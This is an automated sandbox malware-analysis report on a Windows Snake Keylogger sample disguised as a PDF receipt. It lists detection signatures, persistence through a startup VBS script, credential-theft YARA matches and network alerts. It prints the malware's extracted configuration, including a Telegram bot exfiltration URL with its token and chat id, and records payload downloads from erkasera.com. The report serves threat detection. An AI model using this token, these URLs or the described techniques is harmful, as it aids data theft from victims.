Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dekont_001.pdf.exe

Overview

General Information

Sample name:dekont_001.pdf.exe
Analysis ID:1544052
MD5:d998da7be623b6299e9257fcf5f80e3e
SHA1:91d22e36b0aa0484136b1ee6ae17abb1f4963927
SHA256:4bb7ad555a0641fd9020b58ac7fdeb4eab618214f056a489739ad6aa91f528ae
Tags:exe
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Suspicious Double Extension File Execution
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • dekont_001.pdf.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\dekont_001.pdf.exe" MD5: D998DA7BE623B6299E9257FCF5F80E3E)
    • InstallUtil.exe (PID: 7452 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 7776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • RequiredContract.exe (PID: 7844 cmdline: "C:\Users\user\AppData\Roaming\RequiredContract.exe" MD5: D998DA7BE623B6299E9257FCF5F80E3E)
      • InstallUtil.exe (PID: 8028 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8007960326:AAFswhlAovIYra6y-Z3vk6uZa4lj11jIino/sendMessage?chat_id=6008123474", "Token": "8007960326:AAFswhlAovIYra6y-Z3vk6uZa4lj11jIino", "Chat_id": "6008123474", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x1489a:$a1: get_encryptedPassword
      • 0x14b86:$a2: get_encryptedUsername
      • 0x146a6:$a3: get_timePasswordChanged
      • 0x147a1:$a4: get_passwordField
      • 0x148b0:$a5: set_encryptedPassword
      • 0x15f0c:$a7: get_logins
      • 0x15e6f:$a10: KeyLoggerEventArgs
      • 0x15ada:$a11: KeyLoggerEventArgsEventHandler
      00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x198c0:$x1: $%SMTPDV$
      • 0x182a4:$x2: $#TheHashHere%&
      • 0x19868:$x3: %FTPDV$
      • 0x18244:$x4: $%TelegramDv$
      • 0x15ada:$x5: KeyLoggerEventArgs
      • 0x15e6f:$x5: KeyLoggerEventArgs
      • 0x1988c:$m2: Clipboard Logs ID
      • 0x19aca:$m2: Screenshot Logs ID
      • 0x19bda:$m2: keystroke Logs ID
      • 0x19eb4:$m3: SnakePW
      • 0x19aa2:$m4: \SnakeKeylogger\
      00000001.00000002.4215771932.0000000003054000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Click to see the 42 entries
        SourceRuleDescriptionAuthorStrings
        0.2.dekont_001.pdf.exe.6770000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          0.2.dekont_001.pdf.exe.3839550.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.dekont_001.pdf.exe.3839550.4.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              0.2.dekont_001.pdf.exe.3839550.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x12c9a:$a1: get_encryptedPassword
              • 0x12f86:$a2: get_encryptedUsername
              • 0x12aa6:$a3: get_timePasswordChanged
              • 0x12ba1:$a4: get_passwordField
              • 0x12cb0:$a5: set_encryptedPassword
              • 0x1430c:$a7: get_logins
              • 0x1426f:$a10: KeyLoggerEventArgs
              • 0x13eda:$a11: KeyLoggerEventArgsEventHandler
              0.2.dekont_001.pdf.exe.3839550.4.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1a676:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x198a8:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x19cdb:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1ad1a:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 9 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\dekont_001.pdf.exe", CommandLine: "C:\Users\user\Desktop\dekont_001.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\dekont_001.pdf.exe, NewProcessName: C:\Users\user\Desktop\dekont_001.pdf.exe, OriginalFileName: C:\Users\user\Desktop\dekont_001.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\dekont_001.pdf.exe", ProcessId: 7304, ProcessName: dekont_001.pdf.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , ProcessId: 7776, ProcessName: wscript.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs" , ProcessId: 7776, ProcessName: wscript.exe

              Data Obfuscation

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\dekont_001.pdf.exe, ProcessId: 7304, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-28T19:04:19.122909+010028033053Unknown Traffic192.168.2.449733188.114.97.3443TCP
              2024-10-28T19:04:22.531398+010028033053Unknown Traffic192.168.2.449737188.114.97.3443TCP
              2024-10-28T19:04:25.945477+010028033053Unknown Traffic192.168.2.449745188.114.97.3443TCP
              2024-10-28T19:04:27.659639+010028033053Unknown Traffic192.168.2.449748188.114.97.3443TCP
              2024-10-28T19:04:37.154934+010028033053Unknown Traffic192.168.2.449755188.114.97.3443TCP
              2024-10-28T19:04:40.531396+010028033053Unknown Traffic192.168.2.449759188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-28T19:04:17.171949+010028032742Potentially Bad Traffic192.168.2.449731132.226.247.7380TCP
              2024-10-28T19:04:18.406339+010028032742Potentially Bad Traffic192.168.2.449731132.226.247.7380TCP
              2024-10-28T19:04:20.062755+010028032742Potentially Bad Traffic192.168.2.449734132.226.247.7380TCP
              2024-10-28T19:04:35.218856+010028032742Potentially Bad Traffic192.168.2.449753132.226.247.7380TCP
              2024-10-28T19:04:36.390779+010028032742Potentially Bad Traffic192.168.2.449753132.226.247.7380TCP
              2024-10-28T19:04:38.078355+010028032742Potentially Bad Traffic192.168.2.449756132.226.247.7380TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: dekont_001.pdf.exeAvira: detected
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeAvira: detection malicious, Label: HEUR/AGEN.1309900
              Source: 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8007960326:AAFswhlAovIYra6y-Z3vk6uZa4lj11jIino/sendMessage?chat_id=6008123474", "Token": "8007960326:AAFswhlAovIYra6y-Z3vk6uZa4lj11jIino", "Chat_id": "6008123474", "Version": "5.1"}
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeReversingLabs: Detection: 36%
              Source: dekont_001.pdf.exeReversingLabs: Detection: 39%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeJoe Sandbox ML: detected
              Source: dekont_001.pdf.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: dekont_001.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49754 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.132.193.46:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: dekont_001.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1845271222.00000000069D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000035BE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1845271222.00000000069D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000035BE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 010AF206h1_2_010AF017
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 010AFB90h1_2_010AF017
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_010AE538
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_010AEB6B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_010AED4C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066A1A38h1_2_066A1620
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066A02F1h1_2_066A0040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066A1471h1_2_066A11C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AFD11h1_2_066AFA68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AC8F1h1_2_066AC648
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AF8B9h1_2_066AF610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066A1A38h1_2_066A1610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AD1A1h1_2_066ACEF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066ACD49h1_2_066ACAA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AD5F9h1_2_066AD350
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066ADA51h1_2_066AD7A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AE301h1_2_066AE058
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066ADEA9h1_2_066ADC00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AB791h1_2_066AB4E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066A0751h1_2_066A04A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AE759h1_2_066AE4B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066A1011h1_2_066A0D60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AF009h1_2_066AED60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066A1A38h1_2_066A1966
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066ABBE9h1_2_066AB940
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AEBB1h1_2_066AE908
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066A0BB1h1_2_066A0900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AC499h1_2_066AC1F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AF461h1_2_066AF1B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066AC041h1_2_066ABD98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D8945h1_2_066D8608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D72FAh1_2_066D7050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D5D19h1_2_066D5A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D58C1h1_2_066D5618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D6171h1_2_066D5EC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D6A21h1_2_066D6778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D65C9h1_2_066D6320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D6E79h1_2_066D6BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]1_2_066D33A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]1_2_066D33B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D02E9h1_2_066D0040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D0B99h1_2_066D08F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D7751h1_2_066D74A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D0741h1_2_066D0498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D0FF1h1_2_066D0D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D8001h1_2_066D7D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D7BA9h1_2_066D7900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D8459h1_2_066D81B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 066D5441h1_2_066D5198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0108F1F6h7_2_0108F007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 0108FB80h7_2_0108F007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_0108E528
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_0108EB5B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_0108ED3C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06508945h7_2_06508608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06505D19h7_2_06505A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 065058C1h7_2_06505618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06506171h7_2_06505EC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06506A21h7_2_06506778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 065065C9h7_2_06506320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06506E79h7_2_06506BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_065033B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]7_2_065033A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 065072FAh7_2_06507050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 065002E9h7_2_06500040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06500B99h7_2_065008F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06500741h7_2_06500498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06507751h7_2_065074A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06508001h7_2_06507D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06500FF1h7_2_06500D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06507BA9h7_2_06507900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06505441h7_2_06505198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06508459h7_2_065081B0

              Networking

              barindex
              Source: Yara matchFile source: 0.2.dekont_001.pdf.exe.3839550.4.raw.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /ruurew/Ktanfonto.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /ruurew/Ktanfonto.vdf HTTP/1.1Host: erkasera.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/155.94.241.188 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 188.132.193.46 188.132.193.46
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49753 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49756 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49755 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443
